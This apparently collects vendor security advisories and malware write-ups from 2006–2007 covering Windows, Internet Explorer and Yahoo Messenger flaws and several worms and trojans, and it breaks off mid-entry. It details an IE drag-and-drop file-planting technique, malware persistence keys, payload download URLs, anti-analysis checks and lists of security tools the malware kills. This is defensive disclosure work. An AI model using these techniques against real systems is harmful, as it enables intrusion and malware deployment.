Vista Windows Firewall Incorrectly Applies Fltering to Teredo InterfaceAuthor: Jim Hoagland / Ollie Whitehouse
Release Date: 10-07-2007
Application: Windows Firewall (Vista version)
Platform: Windows Vista (RTM and RC2 builds known affected; XP, 2003 would not be affected)
Severity: Unintended remote exposure to services
Vendor status: Resolved in MS07-038
CVE Number: CVE-2007-3038
Reference: http://www.securityfocus.com/bid/24779
Overview: Windows Firewall for Windows Vista is the Microsoft provided
firewall solution. It is installed and enabled out-of-the-box,
with most ports filtered.
Due to an implementation issue, the Windows Firewall does not
apply firewall rules correctly on the Teredo Interface. This
allows a level of remote access to TCP and UDP ports and services
that exceeds what Microsoft expected and what an administrator
would expect.
Details: Teredo is an IPv4 to IPv6 transition mechanism for IPv6-capable
hosts that are located behind an IPv4 NAT. It is installed and
enabled out-of-the-box on Windows Vista. It provides end-to-end
automatic tunneling through a NAT by tunneling IPv6 over IPv4 UDP
packets. Once a Teredo interface becomes set up (in Teredo
terminology: qualified), anyone on the Internet that knows the
Teredo address can send it packets and possibly establish
sessions. This capability persists until the Teredo interface
becomes de-qualified for some reason; while in general Teredo
works to keep an Teredo interface qualified, under some
circumstances, Vista will shut down the interface after 60 minutes
of inactivity.
By design, Windows Firewall is supposed to block all access to
ports on the Teredo interface, except for cases where
access-though-Teredo is specifically requested (through the "Edge
Traversal" flag in the firewall rule being set). However, due to a
logic bug, it does not apply this restriction. Instead, any port
that is accessible on the local network is also accessible from
any host on the Internet over the Teredo interface, even if the
firewall rule specifies "remote address=local subnet".
The level of exposure depends on current firewall rule settings.
An out-of-the-box Vista installation with a network profile set
to "private" will expose the following port across the Teredo
interface:
* TCP port 5357 (Web Services for Devices)
An exposed service may reveal sensitive or useful information to
an attacker. In combination with a vulnerability in the service
it may also provide an avenue of attack. In addition, a service
that was designed to only be accessible in trusted circumstances
may simply not present an adequate security posture for general
Internet access.
It is not considered difficult for a remote user to cause the
Teredo interface to become qualified. Teredo can become qualified
simply because Vista or some application wants to use IPv6 for
whatever reason. The attacker would then just have to guess the
Teredo address or learn it by some means and they would be able to
access any open ports.
Teredo will also become qualified if the address of a peer
represents a Teredo address (perhaps even if the peer has a native
IPv6 Internet access). Thus an attacker can send a URL of this
form "http://[2001:0:...]/..." through e-mail, IM, HTTP, etc, and
if the URL is followed, the attacker will both know the Teredo
address of the victim and will have had the victim become
qualified. A HTTP redirect to such a URL would also work and may be
more stealthy. Reportedly, Vista will not return AAAA records
corresponding to Teredo addresses, so attackers Teredo address
would have to be listed by address and not by hostname.
Vendor Response: This has been patched in MS07-038.
Recommendation: Apply the patch contained in MS07-038.
In addition you should consider whether Teredo poses an acceptable
level of exposure to your network. If it provides too much
exposure (e.g., due to bypassing network-based security controls),
you should disable Teredo and block it on your network
Labels: Bug, Firewall, Microsoft
[Full-disclosure] Advisory: Internet Explorer Drag and Drop Redeux [CVE-2005-3240] (fwd)
From: Matthew Murphy (mattmurphy AT kc.rr.com)
Date: Mon Feb 13 2006 - 18:46:38 CST
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
My apologies to those who are receiving this late or are otherwise
inconvenienced by the staggered release. I had unexpected, last-minute
travel issues that interfered somewhat with today's release.
Of note since the initial drafting of the advisory is that Microsoft has
released a blog post on the MSRC blog about the vulnerability report,
which can be read here:
http://blogs.technet.com/msrc/archive/2006/02/13/419439.aspx
The technical/strategic points about the exploit that are raised in the
post are indeed accurate (though it references MS05-014, when I believe
the correct reference is MS05-008/MS05-013). The exploit has a greater
dependence on timing than previous, related attacks. As such,
Microsoft's decision not to include this issue in a standalone patch is
seemingly justified at this point. However, the point of disagreement
with Microsoft remains the choice of release *timeline*.
I released the information about this issue to a trusted colleague (Gadi
Evron) for publication today, after what I felt was a reasonable time,
in light of my difficulties obtaining internet access.
Though there are disagreements between myself and Microsoft about the
nature of this vulnerability, I would like to thank Brian Schafer of the
MSRC for adhering to a high level of professionalism and technical
accuracy in that post and for continuing to work with me once it was
made clear that the issue would imminently become public.
Also of note is that there was a typo in the information I provided
originally to SecuriTeam. The proper candidate is CVE-2005-3240, not
*3840* as was originally reported by me. SecurityFocus has also
informed me that my original BID reservation was a casualty of a data
migration and that the proper BID associated with this vulnerability is
now BID 16352, which is public in full detail as of this writing.
There have also been some incorrect reports made to SecuriTeam that this
issue does not affect Windows XP Service Pack 2. These reports are not
correct -- my testing during this investigation was done exclusively on
current installations of Windows 2000 and Windows XP. These systems had
all service packs applied and all updates installed when tests were
performed.
Thanks to Gadi Evron for doing some of my bidding today and taking some
of the heat for my fat-fingers.
The final advisory, corrected with the now-accurate references is
attached with an armored-format PGP signature inline.
- --
"Social Darwinism: Try to make something idiot-proof,
nature will provide you with a better idiot."
-- Michael Holstein
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xB5444D38
iD8DBQFD8Shufp4vUrVETTgRA/hpAJ9DobMIa4EH8otBMNlzIPK6RrMGUgCfcrrj
ZI9G00rer59rLkwI5uH0KGQ=
=DQ2a
-----END PGP SIGNATURE-----
Microsoft Internet Explorer Drag-and-Drop Redeux
I. SYNOPSIS
Affected Systems:
* Microsoft Internet Explorer 5.01
* Microsoft Internet Explorer 5.5
* Microsoft Internet Explorer 6.0
- Windows 98
- Windows 98 Second Edition
- Windows Millennium Edition
- Windows 2000
- Windows XP
- Windows Server 2003
Risk: Medium
Impact: Potential remote code execution with some user interaction
Status: Uncoordinated Release
Author: Matthew Murphy (mattmurphykc.rr.com)
II. VULNERABILITY OVERVIEW
Microsoft Internet Explorer suffers from a vulnerability in its handling of certain drag-and-drop events. As a result, it is possible for a malicious web site to predict and exploit the timing of a drag-and-drop operation such that any drag operation (including using scroll-bars) could potentially lead to the installation of arbitrary files in sensitive locations that may enable further system compromise.
III. TECHNICAL DESCRIPTION
As a result of recent updates to its drag-and-drop functionality, Internet Explorer now imposes a rigid set of restrictions on most drag-and-drop sources:
* Input to the browser from other applications is not permitted.
* Dragging an object from inside a frame is not permitted.
* Dragging an HTML element from a top-level window will produce a security warning.
However, certain objects not derived from an HTML document (specifically, file objects within a folder view) remain draggable. This gives rise to a potential race condition in the handling of user input. If an attacker can persuade a user to drag any object within the top-level window that his/her site is contained in, malicious script can redirect these inputs to other top-level windows, potentially resulting in an unintended consequence such as file installation.
Proof-of-concept code has been developed that utilizes a pop-under window pointing to a malicious file share. This window can be created using window.open() or other stealthier methods that are known to evade Internet Explorer's built-in pop-up blocking. Focus is then returned to the opening window, where the user is encouraged to drag an object (image, link, etc.) in a seemingly "safe" fashion.
Immediately prior to this object being dragged, a mouseOver event is triggered that enables the attacker to (with a varying degree of success) predict the imminent drag attempt. The pop-under can then be returned to focus by way of a window.blur() executed in the current window. If the timing of the transition is accurate to a margin of error within a user's reaction time threshold, the user will unwittingly initiate a drag of a file from the pop-under instead of the object originally used as a lure by the attacker.
As soon as it transfers focus, the window with the original interactive content may set a timer (via window.setTimeout()) that returns focus to the window with a simple window.focus() call. After a split-second delay, focus is returned to the interactive window. At this point, on-demand alteration of CSS attributes can be used to display previously-hidden objects (such as inline frames). These objects serve as "drop target" windows and will initiate the copying of the file dropped from the (presumably malicious) pop-under window.
While Internet Explorer blocks hiding or resizing of certain "suspect" objects (IFRAMEs, for instance), so-called container objects (DIV, SPAN, etc.) suffer no such restrictions, even when they contain one of the objects in the former category. The proof-of-concept code as developed simply stores a full-screen inline frame in a container initially marked with the "hidden" visibility style.
The pop-under window, in this instance, would be a folder on a malicious server. This could be accessed via SMB (\\HOSTILESERVER\SHARE), FTP (ftp://hostileserver/somedirectory) or even HTTP (web folders) using certain link behaviors in combination with the click() method of a hyperlink object. In the third case, the pop-under would be targeted to an HTML document initally, which would then open the web folder containing hostile content.
The path to the drop target (the hidden frame in the original window) requires a little more creativity. Particularly in Windows XP Service Pack 2, Microsoft has done a fairly good job of locking down access to local resources. The most interesting vector for the purposes of this attack is via the network redirector. By using the IP address or machine name of the local system (typically obtainable via any number of means), such as:
\\MACHINENAME\share
It becomes possible to access resources offered by the network redirector on the local system. Of most interest is the "Scheduled Tasks" folder:
\\MACHINENAME\Scheduled Tasks
Items dropped into this folder execute automatically at a system-determined time (3 AM local time in tests on Windows XP Professional Service Pack 2) each day as the user dropping the file. Also of interest are common shares such as the administrative shares (C$, D$, etc.) and typical share names like "SharedDocs" on Windows XP. In most cases, this is at least a partial functional equivalent to local file system access and is not subject to zone restrictions, even on Windows XP Service Pack 2.
IV. IMPACT
A malicious web site, with a minimum of social engineering, may be able to compromise user systems by triggering an unintended installation of malicious software. Typical defense-in-depth measures may mitigate this issue. For those who run Internet Explorer with administrative privileges, the impact of any successful exploitation is complete control of the affected system. A malicious web site could install software that would add or delete privileged user accounts, alter, destroy or disclose the content of personal or otherwise sensitive files, record personal information or any number of other activities.
Users who do not browse with such high levels of privilege would be at a significantly reduced risk from exploitation of this vulnerability. In the case of a user with limited privileges, this vulnerability could only be exploited by an attacker to install software that executes with the privileges of that user.
V. WORKAROUNDS
The following workarounds are believed at the time of this writing to be effective against the exploitation of this vulnerability in some form:
1. Set a Kill Bit on the Shell.Explorer Control
-----------------------------------------------
Setting a kill bit on this control will prevent Internet Explorer from displaying the rich folder view interface that gives rise to this attack. For more information about setting kill bits, please see Microsoft Knowledge Base Article 240797:
http://support.microsoft.com/kb/240797
The CLSID of this component as deployed on Windows XP is:
{8856F961-340A-11D0-A96B-00C04FD705A2}
Tools to automate the process of setting this kill bit have been provided at:
http://student.missouristate.edu/m/matthew007/tools/shellkill.zip
PGP signature: http://student.missouristate.edu/m/matthew007/tools/shellkill.zip.asc
Included in this archive are an Administrative Template (.adm) and a VBScript file (.vbs) which implement this setting. The Administrative Template also allows an administrator to work around a specific case of functionality loss caused by the implementation of this workaround. Instructions on using both files are contained within the readme file in the archive.
IMPACT: This workaround will cause Internet Explorer to no longer render folder views for local directories, network file shares, FTP directories and web folders by default. The ability to browse FTP directories in Internet Explorer can be restored by clearing the "Enable Folder View for FTP Sites" option in Internet Explorer's "Advanced" options. However, this countermeasure is known to expose another security vulnerability that does not appear to have been fixed as of this writing:
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005321.html
For ordinary browsing purposes, the Windows Explorer tool is unaffected by this change. This defensive measure has been successfully implemented in at least one commercial software product and tested on a significant scale prior to the release of this advisory. Therefore, it is the belief of the author that potential loss of functionality *should* be minimal. As with all measures, you are encouraged to test the impact of this workaround prior to making any decision about deployment.
2. Prevent Automatic Navigation to Local Intranet Zone (Windows XP SP2, Windows Server 2003 SP1)
------------------------------------------------------------------------------------------------
This workaround will prevent internet content in Internet Explorer from automatically navigating to URLs within the Local Intranet Zone. This effectively prevents the introduction of malicious code to the local system via the network redirector. To implement this workaround, follow these steps:
1. In Internet Explorer's Tools menu, choose "Internet Options..."
2. Select the "Security" tab and choose "Local Intranet"
3. Click the "Custom Level" button
4. Set the "Web sites in less privileged content zone can navigate into this zone" setting to "Disable" or "Prompt".
5. Click OK to close any dialogs and optionally, close Internet Explorer.
IMPACT: This workaround will block or prompt before allowing any navigation to LAN resources from the Internet Zone. Direct access to LAN resources continues to function normally. As a result of this workaround, attempts to access local intranet content (for instance, web applications on corporate intranets) from web sites outside of the LAN will fail or produce prompts, depending upon the chosen setting.
3. Disable Active Scripting
---------------------------
This workaround will prevent internet content from executing script that could potentially cause the exploitation of this vulnerability. To implement this workaround, follow these steps:
1. In Internet Explorer's Tools menu, choose "Internet Options..."
2. Select the "Security" tab and choose "Internet"
3. Click the "Custom Level" button
4. Set the "Active scripting" option to "Prompt" or "Disable".
IMPACT: This workaround will block or prompt before allowing web sites to execute any script statement. Scripting in more-privileged zones (Local Intranet, Trusted Sites) continues to function normally. Setting this option to "Prompt" may cause a significant increase in the number of security prompts received while browsing and may be ineffective in closing this vulnerability for users not capable of making an assessment of a web site's relative trustworthiness.
VI. MITIGATION RECOMMENDATIONS
1. Limit Viewing to Trusted Web Sites
-------------------------------------
In some situations, browsing can be successfully limited to only trustworthy sites without significant loss of productivity. Users should be extremely cautious while browsing unknown or untrusted web sites, as such web sites are often able to introduce hostile code.
2. Run Exposed Applications With Reduced Privilege
--------------------------------------------------
Users who log on interactively without the privileges of powerful groups such as the "Administrators" or "Power Users" groups are at a much lower risk of damage from successful exploitation of software vulnerabilities in client applications. This mitigation step greatly reduces the likelihood of a successful malware installation if this vulnerability is exploited.
VII. VENDOR RESPONSE
Microsoft was informed of this vulnerability on August 3, 2005. Currently, the company has no plans to issue a security update to correct this vulnerability. Fixes for this issue are scheduled to be included in Service Pack 2 of Windows Server 2003 and Service Pack 3 of Windows XP. Of particular note is that Windows 2000 users will *NOT* receive an update to correct this vulnerability.
Microsoft's internal risk-assessment concluded that this issue was not sufficiently serious to be fixed in a security bulletin. This conclusion appears fundamentally inconsistent with the way related issues were handled by Microsoft. In particular, the drag-and-drop vulnerability patched by MS05-013 received an "Important" rating.
I disagree with the technical conclusion behind Microsoft's decision and I further find the timeframe of delivery and deployment for maintenance releases to be largely unsuitable for security fixes of any significant magnitude. I find the harm this decision could potentially inflict upon down-level users (most importantly, users of Windows 2000) to be unjustified by the technical concern Microsoft has raised to me. Microsoft also rejected a request that it consider the issue for inclusion in a later security update as a "Moderate" risk issue.
Due to Microsoft's noncommittal and generally unimpressive response to the issue, this advisory is being issued to inform users of this vulnerability such that defensive action may be taken as desired.
VIII. REFERENCES/STANDARDS
* CVE
The MITRE Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2005-3840 to this issue. Status information and related references for this candidate may be found at:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3840
* OSVDB
The Open Source Vulnerability Database (OSVDB) project has assigned OSVDB vulnerability ID #2707 to this issue. Information will be available shortly after the publication of this advisory at the following URL:
http://www.osvdb.org/displayvuln.php?osvdb_id=2707
* SecurityTracker
SecurityTracker has pre-assigned an alert number in its internal database to reference this issue. Information will be available shortly after the publication of this advisory at the following URL:
http://www.securitytracker.com/id?1015049
* SecurityFocus
SecurityFocus has pre-assigned BugTraq ID #15089 to reference this issue. Information will be available shortly after the publication of this advisory at the following URL:
http://www.securityfocus.com/bid/15089
IX. ACKNOWLEDGEMENTS
* The Administrative Template file supplied in the workaround ZIP was authored by Steven Platt.
X. CONTACT
The author may be contacted via e-mail at mattmurphykc.rr.com
XI. LEGAL
This document is believed accurate based upon information available at the time it was written. However, the information offered is offered in an AS-IS condition, without warranty. By acting upon this information in any way you accept all responsibility for damage that may occur as a result.
This document may be reproduced in whole without limitation and in part provided that a full copy of the original document is readily accessible and the author of the document is duly acknowledged.
Labels: Advisory, http, Microsoft, Vulnerability
Secunia Advisory: SA22896
Release Date: 2007-04-10
Last Update: 2007-04-11
Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
OS:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
CVE reference: CVE-2007-1205
Description:
Secunia Research has discovered a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in Microsoft Agent (agentdpv.dll) when processing specially crafted URLs passed as arguments to certain methods.
Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website with Internet Explorer.
Solution:
Apply patches.
Windows XP (requires SP2):
http://www.microsoft.com/downloads/details.aspx?FamilyId=e16ededa-6e8c-40d6-a3c0-d61362411accWindows XP Professional x64 Edition (optionally with SP2):
http://www.microsoft.com/downloads/details.aspx?FamilyId=23909036-898f-41af-a3de-4a899a15d25dCredits: discovered by JJ Reyes and Carsten Eiram, Secunia Research.
Changelog:
2007-04-11: Added link to US-CERT.
Original Advisory:
MS07-020 (KB932168):
http://www.microsoft.com/technet/security/Bulletin/MS07-020.mspxSecunia Research:
http://secunia.com/secunia_research/2006-74/
Other References:
US-CERT VU#728057:
http://www.kb.cert.org/vuls/id/728057Labels: Advisory, Critical, Microsoft, Vulnerability
Name : Email-Worm:W32/Zhelatin.CQ
Alias: Email-Worm.Win32.Zhelatin.cq
Type: E-Mail Worm, Rootkit
Category: Malware
Platform: Microsoft Windows Win32
Date of Discovery: April 08, 2007
Radar Alert Level 2
Summary The Zhelatin.CQ worm started to spread very late on April 8th, 2007. The worm spreads in e-mails with war-related subjects as an attachment named 'video.exe', 'movie.exe', 'click me.exe' and so on. The worm creates its own peer-to-peer network.
Detailed Description After the worm's file is started by a user, it drops a randomly named file into the same folder where it was started from and runs it. This file installs a rootkit and p2p (peer-to-peer) component into the Windows System folder. The file name is wincom32.sys. The following startup key is created in the Registry for the dropped file:
[HKLM\System\ControlSet001\Services\wincom32]
@ = "%WinSysDir%\wincom32.sys"
The installed component has rootkit features: it hides its Registry keys and active process so that an anti-rootkit engine is needed to reveal them. In addition this component drops a text file named wincom32.ini into the Windows System folder. This file contains a list of clients for the worm's peer-to-peer network. The peer names and access ports are encoded. Here's an example of the file's contents:
[counter]
Counter=0
[peers]
003964D3640550573F800125725481EF=5326859A123900
004982069E5DB75721B54CFF33A26170=5955FC93123900
00A1836AE91D076BC265F9735204714F=451AAE831EBF00
The dropped file also has a blacklist area, but it's empty at the moment. The worm decodes the clients' addresses and access ports and connects itself to the peer-to-peer network. A significant number of UDP connections can be observed when the worm is trying to connect to its p2p network.
At the same time the worm's copy that stays in memory, starts its spreading cycle. It creates a mutex named klllekkdkkd and scans files on local hard disks for victims' e-mail addresses. The worm ignores e-mail addresses if they contain any of the following substrings:
microsoft
.gov
.mil
Then the worm starts to spread in e-mails. It sends messages with the following subjects to all found e-mail addresses:
USA Declares War on Iran
USA Missle Strike: Iran War just have started
Missle Strike: The USA kills more then 20000 Iranian citizens
Missle Strike: The USA kills more then 1000 Iranian citizens
Missle Strike: The USA kills more then 10000 Iranian citizens
Israel Just Have Started World War III
USA Just Have Started World War III
Iran Just Have Started World War III
As you see, the subjects are war-related, so it's a good social engineering trick. The worm always attaches itself to the e-mails that it sends out. The attachment names can be any of the following:
More.exe
Read More.exe
Click Here.exe
Click Me.exe
Read Me.exe
Movie.exe
News.exe
Video.exe
When a recipient of such e-mail opens the attachment, his/her computer becomes infected and the worm continues its spreading cycle.
The worm has a payload. It kills processes if they have the following substrings in their names:
mcafee
taskmgr
hijack
f-pro
lockdown
msconfig
firewall
blackice
avg
vsmon
zonea
spybot
nod32
reged
rav
nav
avp
troja
viru
anti
Labels: Email, Microsoft, Worm
Yahoo! Messenger AudioConf ActiveX Control Buffer Overflow Secunia Advisory: SA24742
Release Date: 2007-04-04
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Yahoo! Messenger 5.x , Yahoo! Messenger 6.x , Yahoo! Messenger 7.x, Yahoo! Messenger 8.x
CVE reference:
CVE-2007-1680 Description:
A vulnerability has been reported in Yahoo! Messenger, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to a boundary error within the AudioConf ActiveX control (yacscom.dll) component of Yahoo! Messenger. This can be exploited to cause a stack-based buffer overflow by setting the "socksHostname" and "hostName" properties to an overly large string and then calling the "createAndJoinConference()" method.
Successful exploitation allows execution of arbitrary code when a user visits a malicious web site.
The vulnerability is reported in version 8.x. Other versions may also be affected.
Solution: Update to the latest version.
http://messenger.yahoo.com
Labels: Critical, Microsoft, Vulnerability
Infostealer.Banker.CRisk Level 1: Very Low
SUMMARY Discovered: April 2, 2007
Updated: April 2, 2007 9:02:00 AM
Type: Trojan
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
Infostealer.Banker.C is a Trojan horse that may steal sensitive information from the compromised computer.
Threat Assessment Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Payload: May steal sensitive information from the compromised computer.
Distribution
Distribution Level: Low
Writeup By: Elia Florio
Labels: Microsoft, Trojan, Virus
W32/Poebot-KN Type Spyware Worm
How it spreads Network shares
Affected operating systems Windows
Side effects Allows others to access the computer; Steals information; Downloads code from the internet; Installs itself in the Registry; Exploits system or software vulnerabilities
W32/Poebot-KN is a worm for the Windows platform.
W32/Poebot-KN spreads through network shares protected by weak passwords and by exploiting common vulnerabilities including:
LSASS (MS04-011)
SRVSVC (MS06-040)
RPC-DCOM (MS04-012)
WKS (MS03-049)
Dameware (CAN-2003-1030)
PNP (MS05-039)
W32/Poebot-KN runs continuously in the background, providing a backdoor server which allows a remote intruder to gain access and control over the computer via IRC channels.
When first run W32/Poebot-KN copies itself to
\spooIsv.exe.
The following registry entry is created to run spooIsv.exe on startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Spooler SubSystem App
\spooIsv.exeLabels: Microsoft, Virus, Worm
Microsoft Windows Animated Cursor Handling Vulnerability
".. any web page, email or content that can load an animated cursor can allow an attacker to take advantage of the vulnerability and run arbitrary code on the users system."
A short overview by SANS of how the different email clients are reacting to the animated cursor vulnerability.
An unofficial fix for the animated cursor vulnerability from Eeye.
Related Articles:
Microsoft confirms animated-cursor flaw: Microsoft confirmed on Thursday that attacker could take control of a user's system by exploiting a flaw in the way the company's Windows software handles animated-cursor files.
========================================
http://secunia.com/advisories/24659/
Microsoft Windows Animated Cursor Handling Vulnerability Secunia Advisory: SA24659
Release Date: 2007-03-30
Critical:
Extremely critical Impact: System access
Where: From remote
Solution Status: Unpatched
OS:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Storage Server 2003
Microsoft Windows Vista
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional
CVE reference:
CVE-2007-0038 Description:
A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an unspecified error in the handling of animated cursors and can e.g. be exploited by tricking a user into visiting a malicious website using Internet Explorer or opening a malicious e-mail message.
Successful exploitation allows execution of arbitrary code.
NOTE: The vulnerability is currently being actively exploited.
Solution:
Do not browse untrusted sites or view untrusted e-mails.Provided and/or discovered by:
Discovered as a 0-day.
Independently discovered by Determina Security Research.
Original Advisory:
Microsoft: http://www.microsoft.com/technet/security/advisory/935423.mspx
http://blogs.technet.com/msrc/archive...-security-advisory-935423-posted.aspx
Determina:
http://www.determina.com/security_cen...ries/securityadvisory_0day_032907.asp
Other References:
US-CERT VU#191609:
http://www.kb.cert.org/vuls/id/191609
================================================================
Labels: Advisory, Microsoft, Virus, Vulnerability
Trojan.Optimizer.BSystems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP
CVE References: CVE-2003-0111, CVE-2005-4560, CVE-2006-0005, CVE-2006-3866, CVE-2006-4868, CVE-2006-6121
Trojan.Linkoptimizer.B is a generic detection for a family of Trojan horse programs that download dialer components, display pop-up advertisements and attempt to prevent removal by blocking security-related applications.
It has been reported that variants of Trojan.Linkoptimizer.B may be installed by visiting several different malicious Web sites while making legitimate searches on some popular search engines.
The initial domains returned by search engines may redirect users to other .com domains with random names which host different browser exploits.
Variants of Trojan.Linkoptimizer.B are installed by exploiting browser vulnerabilities including the following:
Microsoft Java Virtual Machine Bytecode Verifier Vulnerability (Security Focus Bugtraq ID 6221)
Microsoft Windows Media Player Plugin Buffer Overflow Vulnerability (Security Focus Bugtraq ID 16644)
Microsoft WMF Remote Code Execution Vulnerability (Security Focus Bugtraq ID 16074).
Microsoft Internet Explorer VML Remote Code Execution Vulnerability (Security Focus Bugtraq ID 20096).
Acer LunchApp.APlunch ActiveX Control Remote Code Execution Vulnerability (Security Focus Bugtraq ID 21207)
NOTE: At the time of writing, it has been reported that the installation of Trojan.Linkoptimizer.B and its variants works only for users with Italian IP addresses.
The exploits drop an executable file in the following folder:
%Temp%\[RANDOM NAME1].exe
Once executed, the variants of Trojan.Linkoptimizer.B create the following mutexes to ensure that only one copy of the threat is running on the compromised computer:
_x_mgr_
_x_hlp_
The variants may check to see if a modem is installed on the compromised computer by retrieving the Remote Access devices and checking for the presence of one of the following strings, terminating if none are not found:
modem
isdn
It may create the following registry entries so that the threat will be executed everytime Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\"Debugger" = "%System%\[8 RANDOM LETTERS].[EXT]"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\"Debugger" = "%System%\[FIXPART1][FIXPART2].exe"
NOTE: The security permissions of these keys are modified so that Administrator users will not be able to remove or change them.
The variants reportedly may create some of the following registry entries:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared\"sr" = "[RANDOM HEXIDECIMAL VALUE]"
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared\"sr" = "[RANDOM HEXIDECIMAL VALUE]"
It may create some of the following registry subkeys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent
HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia\ShockPlayer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\[5 RANDOM LETTERS]
The Trojan variants attempt to resolve the following domain:
aondskwje.com
NOTE: The numeric IP address obtained from the DNS server is invalid. The address is decrypted and converted to a different IP address value depending on the variant.
The variants may try to download the following encrypted file:
[http://]196.238.242.23/view/logo[REMOVED]
csr
ctf
drv
dsk
hlp
lsa
man
mod
mon
net
sql
srv
svc
sys
tsk
upd
win
While copying itself into %System% folder, the variant appends itself to a variable amount of
random data and patches the security permissions of the file. It then locks the file so that the malicious file cannot be accessed, deleted or renamed.
If the operating System is Windows XP, 2000 or 2003 the variants may start the
Task Scheduler service and add the following task in order to run when Windows starts:
Run: %System%\[FIXED_STRING][5 RANDOM LETTERS].exe
Run as: NT AUTHORITY\System
Schedule: At System Startup
The task is saved in the following file and has the security permissions set to prevent removal.
%Windir%\Tasks\[5 RANDOM LETTERS].job
Next, the Trojan variants attempt to resolve one of the following domains:
itqoipyqsq.com
addwjf6zoy.com
c5ehm8fp.com
NOTE: The numeric IP address obtained from the DNS server is invalid. The address is decrypted and converted to a different IP address value depending on the variant.
The Trojan variant tries to download the following encrypted file:
[http://]85.255.115.133/styles/deskt[REMOVED]
NOTE: At the time of writing the file is downloaded only if the compromised machine has an Italian IP address. It has been observed that non-Italian IP addresses get a 500 error message from the remote Web server.
The downloaded file may install multiple dialer components that will dial high-cost numbers.
The Trojan.Linkoptimizer.B variant checks for the presence of debuggers or monitoring tools. It will not run on computers running on VMWare environment or with any of the following drivers active:
SIWVIDSTART - Numega SoftICE Debugger
FILEMON - Sysinternals Filemon
REGMON - Sysinternals Regmon
PROCMON - Sysinternals Procmon
It may inject a thread into EXPLORER.EXE that attempts to terminate any program which has the following text in window title:
antidialer
avenger
avz antiviral
catchme
ccleaner
dumphive
gmer
hardware upgrade forum
hijackthis
listdlls
p2p forum italia
pjf(ustc)
restore ssdt
runalyzer
silent runners
suspectfile
swreg
Systemscan
unhook selected
unlockerassistant
It may create a copy of itself with one the following names:
%System%\[8 RANDOM LETTERS].[EXT]
%System%\[FIXPART1][FIXPART2].exe
[EXT] is one of the following strings:
bak
dat
log
old
tmp
txt
ver
[FIXPART1] is one of the following strings:
admin
auto
boot
cfg
chat
defrag
demo
dump
edit
key
note
office
power
reg
run
set
sys
sys32
System
task
video
win
win32
[FIXPART2] is one of the following strings:
audit
backup
cache
check
clean
config
control
debug
event
find
info
init
load
lookup
mode
notify
setup
stat
tray
viewer
wizard
Variants of Trojan.Linkoptimizer.B have XML configuration data that can be updated from a remote site and allows the variant to download or install multiple dialer components. The configuration data that can be updated includes high cost numbers to dial with the following prefixes:
899
00881
The variant will also use the updated configuration data to contact one of the following URLs:
[http://]www.webcont.net/CONTENTS/adul[REMOVED]
[http://]www.keycont.net/CONTENTS/audl[REMOVED]
Updated configuration data will also include valid account information for the URLs dialed.
Writeup By: Elia Florio
Labels: Microsoft, Trojan, Virus
Windows Mail URL Bug Lets Remote Users Cause Execute Existing Code on the Target User's System to Be Executed
SecurityTracker Alert ID: 1017816
SecurityTracker URL: http://securitytracker.com/id?1017816
CVE Reference: CVE-2007-1658 (Links to External Site)
Date: Mar 26 2007
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Description: A vulnerability was reported in Windows Mail. A remote user can cause code to be executed on the target user's system without warning when the user clicks on a link.
A remote user can send an e-mail message containing a specially crafted link that, when loaded by the target user, will execute an arbitrary existing executable file located on the target user's system. The executable will run without warning and will run with the privileges of the target user.
Kingcope discovered this vulnerability.
Impact: A remote user can cause existing code located on the target user's system to be executed with the privileges of the target user when the user clicks on a specially crafted link.
Solution: No solution was available at the time of this entry.
Vendor URL: www.microsoft.com/
Cause: State error
Underlying OS: Windows (Vista)
Reported By: "Kingcope"
Labels: Advisory, Microsoft, Vulnerability
Name Troj/DwnLdr-GSP
Type Trojan
Affected operating systems Windows
Side effects Downloads code from the internet
Aliases Trojan-Downloader.Win32.Small.bur
Troj/DwnLdr-GSP is a Trojan for the Windows platform.
Troj/DwnLdr-GSP includes functionality to communicate with a remote server via HTTP.
When Troj/DwnLdr-GSP is executed, it downloads and creates the file
